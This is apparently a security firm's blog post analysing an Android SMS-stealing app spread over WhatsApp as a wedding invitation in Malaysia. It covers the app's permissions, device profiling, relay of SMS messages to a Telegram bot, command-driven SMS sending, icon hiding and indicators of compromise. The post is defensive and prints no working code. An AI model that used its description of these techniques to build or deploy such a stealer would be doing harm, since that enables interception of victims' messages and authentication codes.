This post was authored by Fareed and DetecX team of Netbytesec.
This blog post is intended to give a better overall picture of a malicious Android app campaign attack that believes to be targeted at Malaysians. The threat actor set up and develop an Android application that is able to steal and spy SMS of victims who installed the application on their Android phones. The application was distributed to victims via WhatsApp application by asking users to install the application in order to view an Invitation to a wedding.
This blog post might be useful for security engineers, Android researchers, and security analysts to catch up with current cybersecurity issues specifically mobile malware threats and Malaysia cyber security news. By the end of this blog post, readers will understand the inner working of this recent Android malware attack that happened to the compromised user.
Credit to Mr. Muhammad Kamil, Mr. Fatah, and Mr. Kamarul Baharin from MyCERT and Shaikh Fikri from Cyber999 team for sharing the APK sample and threat insight with Netbytesec team.
Non-technical Executive Summary
For non-technical background, this is an Android malicious application analysis that was conducted and investigated by the Netbytesec team to understand the behavior of the malicious Android application in a details manner so that we can verify how the scammed victims were being compromised or we can call it "hacked" by the scammer using this Android application installed in victim's phone. After installing the application, the malicious app will be able to read all victims' SMS content and have the capability to send SMS to the phone. The impact of this application can expose the sensitive information in the victim's SMS inbox to the scammer/hacker.
Technical Executive Summary
The NBS (Netbytesec) team recently conducted an analysis on a lure Android Package Kit (APK) sample that employs a wedding invitation theme as its modus operandi. This malicious Android application was distributed via WhatsApp, where the threat actor sends a message to the victims with a wedding invitation and an APK file that needs to be downloaded in order to view the invitation card.
Furthermore, once the malicious APK is installed on the victim's Android phone, it proceeds to steal all incoming SMS messages. This phishing method and SMS theft technique employed by the Android application enable the threat actor to spy on the victim's SMS content. This stolen information could potentially be abused for illegal activities, including accessing online banking information or other services that rely on SMS authentication.
The NBS malware analysts have also noticed indicators suggesting that the actor behind this campaign may originate from Indonesia. These suspicions arise from the presence of Indonesian slang in the malware's command and control infrastructure, as well as the discovery of Indonesian telephone numbers within the code.
 |
| Figure 1: Whatsapp conversation (credit to owner) and installed APK does not have a name |
Graph Flow
.jpg) |
| Figure 2: Graph Flow of the modus operandi |
How threat actors distributed the malware
Based on the recent viral posts through social media and news, several victims have received a WhatsApp message regarding an invitation to a wedding. The message contains an invitation and asks targeted users to install the application named "Kad Digital Kahwin.apk" or "Jemputan-Majlis-Perkahwinan.apk" that they're giving in the chat. The actor behind the message told the victims that in order to read the detail of the invitation, the user must first install it.
If you are interested in reading a Facebook post about the experience of the conversation with the threat actor, you can find the link to the post here, https://www.facebook.com/story.php?story_fbid=pfbid02Zv4AUVmd6UnoT9KSRMbRqpGqPiDctoiFadW8Gj1AXVUSuKy5as7tdxPoLyBUc8yhl&id=100069476666645&mibextid=Nif5oz
 |
| Figure 3: WhatsApp conversation between attacker and victims (Credit to owners of the screenshots) |
If we read properly, the threat actor in the WhatsApp conversation in the above figure uses a slang language of Indonesian. This is the first indicator of the Threat Actor group might be from Indonesia.
Technical Analysis
APK metadata information
Application name: Kad Kahwin Digital
Package Name: com.example.myapplication
MD5 hash: a21bc85e2275c90305d9a2a14d7a6664
Dangerous permission:
- android.permission.READ_SMS
- android.permission.SEND_SMS
- android.permission.RECElVE_SMS
Upon initial investigation, the application mainly focuses on SMS-related activities as we look into the permissions. Thus, this malicious APK might have functions like an SMS stealer in a first glance.
Application behavior and interface
Upon opening the application for the first time, the application will ask the user to set the malicious application as the default SMS app in order for the application to get access to the SMS content in the background.
 |
| Figure 4: The app request for permission to read, send and view SMS messages |
The behavior of this can be seen in the java decompile code of the APK in the MainActivity class at method OnCreate.
 |
| Figure 5: Permission request's code |
Once the permissions are allowed, the application will open a web view displaying a website that redirects users to https://ejemputan.com/kadkahwindigital, where they can view the website's contents. Observing the content of the website, the website being accessed is actually a legitimate website owned by the "ejemputan" company, which the attacker utilizes to mimic legit content.
 |
| Figure 6: Webview of the application host a legit website |
The code to load the webview can be seen also in the method OnCreate.
 |
| Figure 7: The code that loads the URL of ejemputan.com |
After that, the user proceeds to interact with the interface of the webview.
Malicious capabilities
Get device information
In the code, the application first will generate a string that will contain the concatenated system information which consists of the device's specifications and build details. The intention behind gathering such information, by the threat actor, is to get information detail about the victim's device.
 |
| Figure 8: The app tries to gather information about the device specification and stores in a variable |
The device specifications information will be sent to the threat actor's command and control server, which is hosted on Telegram. The attacker leverages a Telegram bot to receive and collect the information.
 |
| Figure 9: The app makes communication with the bot soon as the victim grants the permission |
After further investigation and analysis, the Netbytesec team was able to retrieve some of the information of victim's phone information that have been communicated with the Telegram bot which like in the below:
 |
| Figure 10: This message was sent to the Telegram bot and the actor will know the new device that has been infected |
SMS stealer
When the victim's phone receives an SMS, the application can retrieve the message and send it to the Telegram bot.
 |
| Figure 11: Code that does the SMS stealing activity |
The above code is part of a function ReceiveSMS that handles incoming SMS messages. It first converts the messages into a readable format and extracts the sender's address and the message content. The app then sends this information to a Telegram bot, which acts as a communication channel for the attacker. Thus, the code enables the attacker to receive and read the stolen SMS messages through the Telegram chat.
For example, here are some of the messages of victims that have been sent to the attacker C2 infrastructure using the Telegram bot:
 |
| Figure 12: Incoming messages were able to be read by the attacker as the application stole and sent to the Telegram bot |
Send SMS
In the below code, it listens for SMS and when an SMS is received, it retrieves the message content and sender's phone number. The app then replaces certain characters in the message content. If the first part of the message matches a specific number, the victim's phone will send a text message to another phone number with the remaining parts of the message. In the last part of the code, the code informs the Telegram bot about the successful message sending.
 |
| Figure 13: The code that does the sending message activity |
In summary, the code monitors incoming SMS messages, extracts their content and sender information, sends a text message, and informs a Telegram bot about the successful message sending.
Observation
The interesting part of this application is that, once installed, it will be hidden from the main menu of a victim's phone. Netbytesec assumes that this technique is caused by the application having a null name, as shown in the image below in the app settings where the application has no name.
 |
| Figure 14: The app does not have any application name |
Moreover, during the application analysis process, the AndroidManifest.xml file is unreadable. This might be an anti-analysis technique or another technique or maybe a bug in the application. However, it's interesting to investigate more.
In addition, the Netbytesec team assumes that the threat actor behind this malicious APK campaign is from Indonesia. The Indonesian slang in the WhatsApp chat conversations and in the Telegram bot, which hosts their communication functionality, contains the Indonesian language. Furthermore, we discovered a phone number embedded in the code, belongs to the country code of Indonesia.
 |
| Figure 15: Found a phone number that belongs to the country code of Indonesia |
 |
| Figure 16: Found a second phone number that belongs to the country code of Indonesia |
These findings suggest a potential Indonesian connection to this malicious activity.
Based on the information extracted from the bot's messages, the Netbytesec team is unable to track any Malaysian phone numbers that have been compromised by the threat actor. The application only retrieves device information and does not have any information about victim-related data such as phone numbers.
Conclusion
In conclusion, this malicious Android APK acts as a wedding invitation application. The attacker utilizes a common modus operandi, such as distributing the APK through WhatsApp. Once installed, the APK steals incoming SMS messages which can cause exposing sensitive information that could be for illegal activities. Furthermore, the APK attempts to gather device specifications and sends them to their bot channel hosted on Telegram. Also, there is no sign of code and behavior that involve banking information stealing activity. Thus, the intention of the attacker to spy on the victim's SMS remains unclear. The Netbytesec team highly suggests that Android users are always aware of malicious APK scams as this campaign becomes a trend amongst attackers out there to scam and hack people that are using Android phones.
Indicator of Compromise
Hash:
- a21bc85e2275c90305d9a2a14d7a6664
Network:
- api.telegram.org